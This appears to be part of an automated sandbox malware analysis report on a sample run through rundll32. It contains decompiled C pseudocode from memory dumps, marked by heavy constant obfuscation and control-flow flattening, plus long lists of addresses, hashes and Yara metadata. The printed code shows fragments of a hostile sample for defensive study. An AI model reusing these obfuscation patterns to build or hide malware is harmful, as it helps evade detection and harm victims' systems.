                                                                                                                          0x007a9cd0
                                                                                                                          0x007a9cd5
                                                                                                                          0x007a9cdd
                                                                                                                          0x007a9ce5
                                                                                                                          0x007a9cf2
                                                                                                                          0x007a9cf6
                                                                                                                          0x007a9cfa
                                                                                                                          0x007a9cfe
                                                                                                                          0x007a9d06
                                                                                                                          0x007a9d0e
                                                                                                                          0x007a9d13
                                                                                                                          0x007a9d1b
                                                                                                                          0x007a9d23
                                                                                                                          0x007a9d2b
                                                                                                                          0x007a9d33
                                                                                                                          0x007a9d3b
                                                                                                                          0x007a9d3b
                                                                                                                          0x007a9d4d
                                                                                                                          0x007a9e02
                                                                                                                          0x00000000
                                                                                                                          0x007a9d53
                                                                                                                          0x007a9d59
                                                                                                                          0x007a9df6
                                                                                                                          0x007a9df8
                                                                                                                          0x00000000
                                                                                                                          0x007a9d5f
                                                                                                                          0x007a9d65
                                                                                                                          0x007a9dc1
                                                                                                                          0x007a9dc9
                                                                                                                          0x007a9dce
                                                                                                                          0x007a9dd1
                                                                                                                          0x007a9dd3
                                                                                                                          0x007a9dd5
                                                                                                                          0x00000000
                                                                                                                          0x007a9dd5
                                                                                                                          0x007a9d67
                                                                                                                          0x007a9d6d
                                                                                                                          0x007a9da0
                                                                                                                          0x007a9da5
                                                                                                                          0x007a9da7
                                                                                                                          0x007a9da9
                                                                                                                          0x007a9daf
                                                                                                                          0x00000000
                                                                                                                          0x007a9daf
                                                                                                                          0x007a9d6f
                                                                                                                          0x007a9d75
                                                                                                                          0x00000000
                                                                                                                          0x007a9d7b
                                                                                                                          0x007a9d8f
                                                                                                                          0x007a9d91
                                                                                                                          0x00000000
                                                                                                                          0x007a9d91
                                                                                                                          0x007a9d75
                                                                                                                          0x007a9d6d
                                                                                                                          0x007a9d65
                                                                                                                          0x007a9d59
                                                                                                                          0x00000000
                                                                                                                          0x007a9d4d
                                                                                                                          0x007a9e0c
                                                                                                                          0x007a9e16
                                                                                                                          0x007a9e1f
                                                                                                                          0x007a9e27
                                                                                                                          0x007a9e33
                                                                                                                          0x007a9e35
                                                                                                                          0x007a9e38
                                                                                                                          0x007a9e3d
                                                                                                                          0x007a9e3d
                                                                                                                          0x007a9e3d
                                                                                                                          0x007a9e4a
                                                                                                                          0x007a9e55

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: <~)$`/&$cA$m9
                                                                                                                          • API String ID: 0-2671356241
                                                                                                                          • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                          • Instruction ID: 1533f588d5a3d3194c4d2eb0219dc7355952d180916296582ffe2ac12ada9c01
                                                                                                                          • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                          • Instruction Fuzzy Hash: E851747110C3019FC388CE21D09942BBBE1FFD8758F501E1EF6A696261C378CA598F92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00799B83 Relevance: 5.1, Strings: 4, Instructions: 109COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E00799B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _v64;
				intOrPtr _v68;
				void* _t115;
				signed int _t130;
				signed int _t131;
				void* _t133;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E007A20B9(0x104);
				_v68 = 0x342964;
				asm("stosd");
				_t133 = 0;
				asm("stosd");
				asm("stosd");
				_v40 = 0xa3a3c;
				_v40 = _v40 + 0x2c25;
				_v40 = _v40 ^ 0x000a7661;
				_v16 = 0x75ee44;
				_t130 = 0x7a;
				_v16 = _v16 / _t130;
				_v16 = _v16 ^ 0xc9e42672;
				_v16 = _v16 ^ 0xc9e58a7e;
				_v8 = 0x386b92;
				_v8 = _v8 << 4;
				_v8 = _v8 | 0x0ec9a536;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000b4478;
				_v44 = 0xd66787;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x001d593f;
				_v24 = 0x7c5a73;
				_v24 = _v24 | 0xae316990;
				_t131 = 0x19;
				_v24 = _v24 / _t131;
				_v24 = _v24 ^ 0x06f0967a;
				_v20 = 0x3dfd52;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x24;
				_v20 = _v20 ^ 0x0009affd;
				_v12 = 0xf0c6a5;
				_v12 = _v12 + 0xffff2be4;
				_v12 = _v12 + 0x1686;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x03c3840c;
				_v48 = 0x30c967;
				_v48 = _v48 | 0xcae095b2;
				_v48 = _v48 ^ 0xcaf7f966;
				_v36 = 0xabcbdc;
				_v36 = _v36 + 0xfffff856;
				_v36 = _v36 | 0xb2b71321;
				_v36 = _v36 ^ 0xb2b3c312;
				_v32 = 0xda8dbe;
				_v32 = _v32 + 0xffff364b;
				_v32 = _v32 | 0x02598b37;
				_v32 = _v32 ^ 0x02d31c0a;
				_v28 = 0x528ee8;
				_v28 = _v28 * 0x12;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x17383776;
				_t115 = E007991DD(__ecx, _v40, __ecx);
				_t132 = _t115;
				if(_t115 != 0) {
					_t133 = E007976AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
					E007A1E67(_v48, _v36, _v32, _v28, _t132);
				}
				return _t133;
			}





















                                                                                                                          0x00799b8b
                                                                                                                          0x00799b93
                                                                                                                          0x00799b96
                                                                                                                          0x00799b99
                                                                                                                          0x00799b9c
                                                                                                                          0x00799b9f
                                                                                                                          0x00799ba0
                                                                                                                          0x00799ba1
                                                                                                                          0x00799ba6
                                                                                                                          0x00799bb4
                                                                                                                          0x00799bb5
                                                                                                                          0x00799bb9
                                                                                                                          0x00799bba
                                                                                                                          0x00799bbb
                                                                                                                          0x00799bc2
                                                                                                                          0x00799bc9
                                                                                                                          0x00799bd0
                                                                                                                          0x00799bda
                                                                                                                          0x00799bdf
                                                                                                                          0x00799be4
                                                                                                                          0x00799beb
                                                                                                                          0x00799bf2
                                                                                                                          0x00799bf9
                                                                                                                          0x00799bfd
                                                                                                                          0x00799c04
                                                                                                                          0x00799c08
                                                                                                                          0x00799c0f
                                                                                                                          0x00799c16
                                                                                                                          0x00799c1a
                                                                                                                          0x00799c21
                                                                                                                          0x00799c28
                                                                                                                          0x00799c32
                                                                                                                          0x00799c38
                                                                                                                          0x00799c3b
                                                                                                                          0x00799c42
                                                                                                                          0x00799c49
                                                                                                                          0x00799c52
                                                                                                                          0x00799c55
                                                                                                                          0x00799c5c
                                                                                                                          0x00799c63
                                                                                                                          0x00799c6a
                                                                                                                          0x00799c71
                                                                                                                          0x00799c75
                                                                                                                          0x00799c7c
                                                                                                                          0x00799c83
                                                                                                                          0x00799c8a
                                                                                                                          0x00799c91
                                                                                                                          0x00799c98
                                                                                                                          0x00799c9f
                                                                                                                          0x00799ca6
                                                                                                                          0x00799cad
                                                                                                                          0x00799cb4
                                                                                                                          0x00799cbb
                                                                                                                          0x00799cc2
                                                                                                                          0x00799cc9
                                                                                                                          0x00799cd4
                                                                                                                          0x00799cd7
                                                                                                                          0x00799cdb
                                                                                                                          0x00799ceb
                                                                                                                          0x00799cf3
                                                                                                                          0x00799cf7
                                                                                                                          0x00799d16
                                                                                                                          0x00799d21
                                                                                                                          0x00799d26
                                                                                                                          0x00799d30

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Du$av$d)4$sZ|
                                                                                                                          • API String ID: 0-269012183
                                                                                                                          • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                          • Instruction ID: c9156c91db360bd20a3c1e7761b8f77de98e5bf10ea60cb9bc9b3fea05b7c84d
                                                                                                                          • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                          • Instruction Fuzzy Hash: 9D5112B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108158E412B6260D3755A59DFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                          • GetACP.KERNEL32 ref: 1004377E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4232894706-0
                                                                                                                          • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                          • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                          • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                          • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                          • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                          • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                          • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A0E53 Relevance: 4.1, Strings: 3, Instructions: 343COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E007A0E53(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t406;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t435;
				void* _t467;
				void* _t468;
				signed int* _t472;

				_t472 =  &_v2772;
				_v2700 = 0xd36ba7;
				_v2700 = _v2700 << 7;
				_v2700 = _v2700 ^ 0xaed70c65;
				_v2700 = _v2700 ^ 0xc762dfcc;
				_v2652 = 0x6f4609;
				_t9 =  &_v2652; // 0x6f4609
				_v2652 =  *_t9 * 0x1c;
				_t467 = __ecx;
				_v2652 = _v2652 ^ 0x0c23569d;
				_t468 = 0xea1969c;
				_v2608 = 0xb8394b;
				_v2608 = _v2608 + 0xaeb5;
				_v2608 = _v2608 ^ 0x00b390c3;
				_v2736 = 0x3d33f1;
				_v2736 = _v2736 + 0xffffd537;
				_v2736 = _v2736 + 0xffffb6ee;
				_v2736 = _v2736 + 0xbad8;
				_v2736 = _v2736 ^ 0x003e0409;
				_v2768 = 0xd1d4ce;
				_v2768 = _v2768 >> 0xc;
				_v2768 = _v2768 ^ 0xb5c37fe4;
				_v2768 = _v2768 + 0x4eb3;
				_v2768 = _v2768 ^ 0xb5c2c9c4;
				_v2760 = 0x157bbd;
				_v2760 = _v2760 ^ 0x6d7617e7;
				_v2760 = _v2760 ^ 0x1b56cd2f;
				_v2760 = _v2760 ^ 0xfb63426d;
				_v2760 = _v2760 ^ 0x8d577604;
				_v2604 = 0x1fac8b;
				_v2604 = _v2604 + 0x9962;
				_v2604 = _v2604 ^ 0x0029d956;
				_v2696 = 0x3d46b4;
				_v2696 = _v2696 | 0x3d7fd3ff;
				_v2696 = _v2696 ^ 0x3d7bd02d;
				_v2720 = 0xad1695;
				_t426 = 9;
				_v2720 = _v2720 * 0x4b;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0x0cab1f79;
				_v2644 = 0xe14118;
				_v2644 = _v2644 ^ 0x82369820;
				_v2644 = _v2644 ^ 0x82de8a4e;
				_v2668 = 0x391c30;
				_v2668 = _v2668 >> 7;
				_v2668 = _v2668 + 0xffff3589;
				_v2668 = _v2668 ^ 0xfff6d862;
				_v2692 = 0x9dbc3;
				_v2692 = _v2692 << 8;
				_v2692 = _v2692 * 0x75;
				_v2692 = _v2692 ^ 0x81749ad9;
				_v2660 = 0x144a46;
				_v2660 = _v2660 >> 0xd;
				_v2660 = _v2660 ^ 0x0008b8c7;
				_v2752 = 0x703c03;
				_v2752 = _v2752 * 0x74;
				_v2752 = _v2752 ^ 0x2e54cb21;
				_v2752 = _v2752 | 0x6f17e683;
				_v2752 = _v2752 ^ 0x7f96e2f0;
				_v2676 = 0xa438e5;
				_v2676 = _v2676 / _t426;
				_v2676 = _v2676 + 0x92ff;
				_v2676 = _v2676 ^ 0x0015b827;
				_v2612 = 0x1c48b9;
				_t427 = 0x1a;
				_v2612 = _v2612 / _t427;
				_v2612 = _v2612 ^ 0x000154fb;
				_v2628 = 0x490198;
				_v2628 = _v2628 | 0x561f6486;
				_v2628 = _v2628 ^ 0x565ec1b9;
				_v2616 = 0xcec4ed;
				_t428 = 0x3d;
				_v2616 = _v2616 * 9;
				_v2616 = _v2616 ^ 0x074f393e;
				_v2636 = 0x4be85b;
				_v2636 = _v2636 >> 1;
				_v2636 = _v2636 ^ 0x002afd34;
				_v2728 = 0xca47ed;
				_v2728 = _v2728 << 1;
				_v2728 = _v2728 / _t428;
				_v2728 = _v2728 >> 3;
				_v2728 = _v2728 ^ 0x00084593;
				_v2620 = 0x793301;
				_v2620 = _v2620 | 0xccc0d5da;
				_v2620 = _v2620 ^ 0xccf56683;
				_v2684 = 0xd6c9e7;
				_v2684 = _v2684 >> 8;
				_v2684 = _v2684 + 0x30fc;
				_v2684 = _v2684 ^ 0x000dbf27;
				_v2656 = 0x6cf887;
				_v2656 = _v2656 | 0x54469415;
				_v2656 = _v2656 ^ 0x5469dd96;
				_v2712 = 0x1ba43e;
				_v2712 = _v2712 + 0xffff54b6;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x536d0b9d;
				_v2712 = _v2712 ^ 0x5368fd88;
				_v2744 = 0x7fa81e;
				_v2744 = _v2744 + 0x45dd;
				_v2744 = _v2744 | 0xcc5c3b14;
				_t429 = 0x76;
				_v2744 = _v2744 * 0x48;
				_v2744 = _v2744 ^ 0x83f6fb81;
				_v2704 = 0x73cce1;
				_v2704 = _v2704 >> 6;
				_v2704 = _v2704 | 0x0e0742c3;
				_v2704 = _v2704 ^ 0x0e0521c8;
				_v2764 = 0x3737a7;
				_v2764 = _v2764 >> 0xb;
				_v2764 = _v2764 << 3;
				_v2764 = _v2764 + 0x14ac;
				_v2764 = _v2764 ^ 0x0004654a;
				_v2772 = 0xaeb57f;
				_v2772 = _v2772 / _t429;
				_v2772 = _v2772 << 0xf;
				_t430 = 0x37;
				_v2772 = _v2772 / _t430;
				_v2772 = _v2772 ^ 0x037ee988;
				_v2648 = 0x954498;
				_t431 = 0x4b;
				_v2648 = _v2648 / _t431;
				_v2648 = _v2648 ^ 0x00054dec;
				_v2640 = 0x8be41e;
				_v2640 = _v2640 >> 0xd;
				_v2640 = _v2640 ^ 0x00089615;
				_v2748 = 0xfabe1b;
				_v2748 = _v2748 ^ 0xff42a680;
				_v2748 = _v2748 + 0xffff8ee7;
				_v2748 = _v2748 + 0x1c5a;
				_v2748 = _v2748 ^ 0xffbaa703;
				_v2756 = 0x33a01d;
				_v2756 = _v2756 * 0x6f;
				_v2756 = _v2756 << 4;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 ^ 0x066d94da;
				_v2672 = 0x7cb69f;
				_v2672 = _v2672 << 4;
				_v2672 = _v2672 * 0x4a;
				_v2672 = _v2672 ^ 0x40c5c2d0;
				_v2680 = 0xc0e1f8;
				_v2680 = _v2680 << 1;
				_v2680 = _v2680 | 0xa5ca1830;
				_v2680 = _v2680 ^ 0xa5ca6401;
				_v2732 = 0xd52773;
				_v2732 = _v2732 ^ 0x8b84e9f5;
				_v2732 = _v2732 + 0xffffa58a;
				_v2732 = _v2732 >> 1;
				_v2732 = _v2732 ^ 0x45a69f9f;
				_v2740 = 0x525c84;
				_v2740 = _v2740 * 0x45;
				_v2740 = _v2740 << 0xd;
				_v2740 = _v2740 + 0xffffe485;
				_v2740 = _v2740 ^ 0x5df42895;
				_v2688 = 0x8afd1b;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x44;
				_v2688 = _v2688 ^ 0x000c822b;
				_v2632 = 0xb6ec99;
				_v2632 = _v2632 + 0xffff2a9a;
				_v2632 = _v2632 ^ 0x00b1db1a;
				_v2664 = 0xfa37e2;
				_v2664 = _v2664 * 0x4c;
				_v2664 = _v2664 + 0x9251;
				_v2664 = _v2664 ^ 0x4a4e0c53;
				_v2708 = 0xf9311d;
				_v2708 = _v2708 >> 2;
				_t406 = _v2708 * 0x30;
				_v2708 = _t406;
				_v2708 = _v2708 + 0xffffde46;
				_v2708 = _v2708 ^ 0x0bad021b;
				_v2624 = 0x51d14;
				_v2624 = _v2624 | 0x271919e8;
				_v2624 = _v2624 ^ 0x2716653c;
				_v2716 = 0x708eea;
				_v2716 = _v2716 + 0xfffff8d8;
				_v2716 = _v2716 | 0x4ca3cf3c;
				_v2716 = _v2716 ^ 0x396f5f4d;
				_v2716 = _v2716 ^ 0x7599e4cd;
				_v2724 = 0x3acc77;
				_v2724 = _v2724 + 0x56d;
				_v2724 = _v2724 + 0xb0bb;
				_v2724 = _v2724 + 0xffffce89;
				_v2724 = _v2724 ^ 0x003c4612;
				while(_t468 != 0x5de06da) {
					if(_t468 == 0xea1969c) {
						_t468 = 0xfa9128f;
						continue;
					} else {
						_t480 = _t468 - 0xfa9128f;
						if(_t468 != 0xfa9128f) {
							L8:
							__eflags = _t468 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E007ADA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
							 *((short*)(E0079B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
							E00798969(_v2720,  &_v1560, _t480, _v2644, _v2668);
							_push(_v2752);
							_push(_v2660);
							E007947CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E007ADCF7(_v2692, 0x791308, _t480),  &_v1560, _v2616, _v2636);
							E0079A8B0(_v2728, _t419, _v2620);
							_t431 = _v2684;
							_t406 = E0079EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
							_t472 =  &(_t472[0x17]);
							if(_t406 != 0) {
								_t468 = 0x5de06da;
								continue;
							}
						}
					}
					return _t406;
				}
				_push(_v2648);
				_push(_v2700);
				_push(_v2772);
				_push( &_v1040);
				E007A46BB(_v2704, _v2764);
				_push(_v2756);
				_push(_v2748);
				E007947CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E007ADCF7(_v2640, 0x7913b8, __eflags),  &_v2080, _v2740, _v2688);
				_t435 = _v2632;
				E0079A8B0(_t435, _t409, _v2664);
				__eflags = 0;
				_push(_v2724);
				_push(0);
				_push(_t435);
				_push(0);
				_push(0);
				_push(_v2716);
				_t431 = _v2708;
				_push( &_v520);
				_t406 = E0079AB87(_v2708, _v2624, 0);
				_t472 = _t472 - 0xc + 0x64;
				_t468 = 0xa8e801c;
				goto L8;
			}





























































                                                                                                                          0x007a0e53
                                                                                                                          0x007a0e59
                                                                                                                          0x007a0e63
                                                                                                                          0x007a0e68
                                                                                                                          0x007a0e70
                                                                                                                          0x007a0e78
                                                                                                                          0x007a0e80
                                                                                                                          0x007a0e89
                                                                                                                          0x007a0e90
                                                                                                                          0x007a0e92
                                                                                                                          0x007a0e9d
                                                                                                                          0x007a0ea2
                                                                                                                          0x007a0ead
                                                                                                                          0x007a0eb8
                                                                                                                          0x007a0ec3
                                                                                                                          0x007a0ecb
                                                                                                                          0x007a0ed3
                                                                                                                          0x007a0edb
                                                                                                                          0x007a0ee3
                                                                                                                          0x007a0eeb
                                                                                                                          0x007a0ef3
                                                                                                                          0x007a0ef8
                                                                                                                          0x007a0f00
                                                                                                                          0x007a0f08
                                                                                                                          0x007a0f10
                                                                                                                          0x007a0f18
                                                                                                                          0x007a0f20
                                                                                                                          0x007a0f28
                                                                                                                          0x007a0f30
                                                                                                                          0x007a0f38
                                                                                                                          0x007a0f43
                                                                                                                          0x007a0f4e
                                                                                                                          0x007a0f59
                                                                                                                          0x007a0f61
                                                                                                                          0x007a0f69
                                                                                                                          0x007a0f71
                                                                                                                          0x007a0f80
                                                                                                                          0x007a0f83
                                                                                                                          0x007a0f87
                                                                                                                          0x007a0f8c
                                                                                                                          0x007a0f91
                                                                                                                          0x007a0f99
                                                                                                                          0x007a0fa4
                                                                                                                          0x007a0faf
                                                                                                                          0x007a0fba
                                                                                                                          0x007a0fc2
                                                                                                                          0x007a0fc7
                                                                                                                          0x007a0fcf
                                                                                                                          0x007a0fd7
                                                                                                                          0x007a0fdf
                                                                                                                          0x007a0fe9
                                                                                                                          0x007a0fed
                                                                                                                          0x007a0ff5
                                                                                                                          0x007a1000
                                                                                                                          0x007a1008
                                                                                                                          0x007a1013
                                                                                                                          0x007a1020
                                                                                                                          0x007a1024
                                                                                                                          0x007a102c
                                                                                                                          0x007a1034
                                                                                                                          0x007a103c
                                                                                                                          0x007a104c
                                                                                                                          0x007a1050
                                                                                                                          0x007a1058
                                                                                                                          0x007a1060
                                                                                                                          0x007a1072
                                                                                                                          0x007a1075
                                                                                                                          0x007a107c
                                                                                                                          0x007a1089
                                                                                                                          0x007a1094
                                                                                                                          0x007a109f
                                                                                                                          0x007a10aa
                                                                                                                          0x007a10bf
                                                                                                                          0x007a10c2
                                                                                                                          0x007a10c9
                                                                                                                          0x007a10d4
                                                                                                                          0x007a10df
                                                                                                                          0x007a10e6
                                                                                                                          0x007a10f1
                                                                                                                          0x007a10f9
                                                                                                                          0x007a1105
                                                                                                                          0x007a1109
                                                                                                                          0x007a110e
                                                                                                                          0x007a1116
                                                                                                                          0x007a1121
                                                                                                                          0x007a112c
                                                                                                                          0x007a1137
                                                                                                                          0x007a113f
                                                                                                                          0x007a1144
                                                                                                                          0x007a114c
                                                                                                                          0x007a1154
                                                                                                                          0x007a115f
                                                                                                                          0x007a116a
                                                                                                                          0x007a1175
                                                                                                                          0x007a117d
                                                                                                                          0x007a1185
                                                                                                                          0x007a118a
                                                                                                                          0x007a1192
                                                                                                                          0x007a119a
                                                                                                                          0x007a11a2
                                                                                                                          0x007a11aa
                                                                                                                          0x007a11b7
                                                                                                                          0x007a11ba
                                                                                                                          0x007a11be
                                                                                                                          0x007a11c6
                                                                                                                          0x007a11ce
                                                                                                                          0x007a11d3
                                                                                                                          0x007a11db
                                                                                                                          0x007a11e3
                                                                                                                          0x007a11eb
                                                                                                                          0x007a11f0
                                                                                                                          0x007a11f5
                                                                                                                          0x007a11fd
                                                                                                                          0x007a1205
                                                                                                                          0x007a1215
                                                                                                                          0x007a1219
                                                                                                                          0x007a1222
                                                                                                                          0x007a1227
                                                                                                                          0x007a122d
                                                                                                                          0x007a1235
                                                                                                                          0x007a1247
                                                                                                                          0x007a124a
                                                                                                                          0x007a1251
                                                                                                                          0x007a125c
                                                                                                                          0x007a1267
                                                                                                                          0x007a126f
                                                                                                                          0x007a127a
                                                                                                                          0x007a1282
                                                                                                                          0x007a128a
                                                                                                                          0x007a1292
                                                                                                                          0x007a129a
                                                                                                                          0x007a12a7
                                                                                                                          0x007a12b9
                                                                                                                          0x007a12bd
                                                                                                                          0x007a12c2
                                                                                                                          0x007a12c7
                                                                                                                          0x007a12cf
                                                                                                                          0x007a12d7
                                                                                                                          0x007a12e1
                                                                                                                          0x007a12e5
                                                                                                                          0x007a12ed
                                                                                                                          0x007a12f5
                                                                                                                          0x007a12f9
                                                                                                                          0x007a1301
                                                                                                                          0x007a1309
                                                                                                                          0x007a1311
                                                                                                                          0x007a1319
                                                                                                                          0x007a1321
                                                                                                                          0x007a1325
                                                                                                                          0x007a132d
                                                                                                                          0x007a133a
                                                                                                                          0x007a133e
                                                                                                                          0x007a1343
                                                                                                                          0x007a134b
                                                                                                                          0x007a1353
                                                                                                                          0x007a135b
                                                                                                                          0x007a1365
                                                                                                                          0x007a1369
                                                                                                                          0x007a1371
                                                                                                                          0x007a137c
                                                                                                                          0x007a1387
                                                                                                                          0x007a1392
                                                                                                                          0x007a139f
                                                                                                                          0x007a13a3
                                                                                                                          0x007a13ab
                                                                                                                          0x007a13b3
                                                                                                                          0x007a13bb
                                                                                                                          0x007a13c0
                                                                                                                          0x007a13c5
                                                                                                                          0x007a13c9
                                                                                                                          0x007a13d1
                                                                                                                          0x007a13d9
                                                                                                                          0x007a13e4
                                                                                                                          0x007a13ef
                                                                                                                          0x007a13fa
                                                                                                                          0x007a1402
                                                                                                                          0x007a140a
                                                                                                                          0x007a1412
                                                                                                                          0x007a141a
                                                                                                                          0x007a1422
                                                                                                                          0x007a142a
                                                                                                                          0x007a1432
                                                                                                                          0x007a143a
                                                                                                                          0x007a1442
                                                                                                                          0x007a144a
